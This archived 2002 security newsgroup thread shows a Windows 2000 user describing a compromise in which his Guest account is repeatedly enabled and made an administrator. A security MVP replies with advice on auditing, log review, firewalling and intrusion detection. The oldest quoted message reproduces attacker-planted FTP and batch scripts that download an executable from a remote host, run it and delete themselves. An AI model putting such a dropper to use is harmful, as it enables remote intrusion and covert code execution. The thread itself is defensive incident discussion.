Re: Is it really true that NTFS is secure?
From: Karl Levinson [x y] mvp (levinson_k@excite.com)
Date: 12/13/02
- Next message: Karl Levinson [x y] mvp: "Re: Network Auditing for MS Products Qt."
- Previous message: Karl Levinson [x y] mvp: "Re: loading VPN and trying to remove firewall"
- In reply to: George Hester: "Re: Is it really true that NTFS is secure?"
- Next in thread: George Hester: "Re: Is it really true that NTFS is secure?"
- Reply: George Hester: "Re: Is it really true that NTFS is secure?"
- Reply: George Hester: "Re: Is it really true that NTFS is secure?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Karl Levinson [x y] mvp" <levinson_k@excite.com> Date: Fri, 13 Dec 2002 12:35:41 -0500
You can enable auditing to watch for things like this:
http://securityadmin.info/faq.htm#auditing
Checking your IIS web logs is another common place to check. Look for
anything that mentions .EXE or % and that also has a code 200 or 502 in that
line. URLScan is a free IIS tool that comes with IISLockdown from
www.microsoft.com/technet/security that will block all this stuff, if that's
what this is. Most firewalls won't detect or block this stuff.
Be sure you have a firewall, as this will log all traffic to and from your
server. The firewall should also block NetBIOS traffic on TCP and UDP ports
135-139 and 445 from the internet, as this is another way people could be
accessing your guest account.
Intrusion detection such as Black Ice or Snort [free] might be worth a try,
though getting Snort to alert just on interesting events on a Windows server
takes some knowledge.
The free file change checker from www.gfi.com can also help you monitor your
system for intrusions not caught by antivirus, trojan scanners or firewalls.
Other things to do to look for the source of the hacking and secure your
servers and computers are listed at:
http://securityadmin.info/faq.htm#hacked [first]
http://securityadmin.info/faq.htm#harden [second]
"George Hester" <hesterloli@hotmail.com> wrote in message
news:ufXDRfmoCHA.2424@TK2MSFTNGP12...
Please understand that my machine comes up empty handed on all AV scans and
trojans. I need to find some way of watching when this Group Policy change
happens. Like a log. That tells me the time that it happend or the
responsible party. It doesn't show in Event Viewer.
You know I ran a server W2K prior to this and never had this issue. Started
on Prof full time now and I am battling security it seems every hour.
-- George Hester __________________________________ "George Hester" <hesterloli@hotmail.com> wrote in message news:OwrkSZmoCHA.2424@TK2MSFTNGP12... Yes you may be able to help me with something. My Guerst user keeps getting enabled and put in the Administrator group. How? -- George Hester __________________________________ "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message news:eleuHGkoCHA.1628@TK2MSFTNGP12... > Do you have a problem we could help you with? Are there more details? > > What does this code have to do with NTFS? I'm sorry if your machine was > exploited, though I'm not sure this has to do with NTFS. > > NTFS file permissions are plenty secure against remote exploits. If you > have other security vulnerabilities that permit running commands as an > account that has permissions in the NTFS ACLs, that's not exactly an NTFS > failing. > > Windows 2000 configured correctly is as secure as most other operating > systems configured correctly. Windows 2000 in the default install is about > as un-secure as Linux in the default install, especially if you go back to > Linux from the year 2000. Securing Windows 2000 is about as complex and > time consuming as securing Linux, maybe even easier. > > More information on ways to determine how you were hacked and how to secure > your computer: > > http://securityadmin.info/faq.htm#hacked > http://securityadmin.info/faq.htm#re-secure > http://securityadmin.info/faq.htm#harden > > > "George Hester" <hesterloli@hotmail.com> wrote in message > news:uB7a4afoCHA.2220@TK2MSFTNGP09... > '--------- File: s.t sitting in %SystemRoot%\system32 -> > open #my.ip.address# 'chnaged ip for privacy > binary > recv sui.exe .\sui.exe > quit > /-------- End of s.t > > REM File r.bat sitting in %SystemRoot%\system32 --> > ftp -vnAs:s.t > del s.t > sui.exe -s678p345 -o > call g.bat > del r.bat > REM End of r.bat -------- > > > >
- Next message: Karl Levinson [x y] mvp: "Re: Network Auditing for MS Products Qt."
- Previous message: Karl Levinson [x y] mvp: "Re: loading VPN and trying to remove firewall"
- In reply to: George Hester: "Re: Is it really true that NTFS is secure?"
- Next in thread: George Hester: "Re: Is it really true that NTFS is secure?"
- Reply: George Hester: "Re: Is it really true that NTFS is secure?"
- Reply: George Hester: "Re: Is it really true that NTFS is secure?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
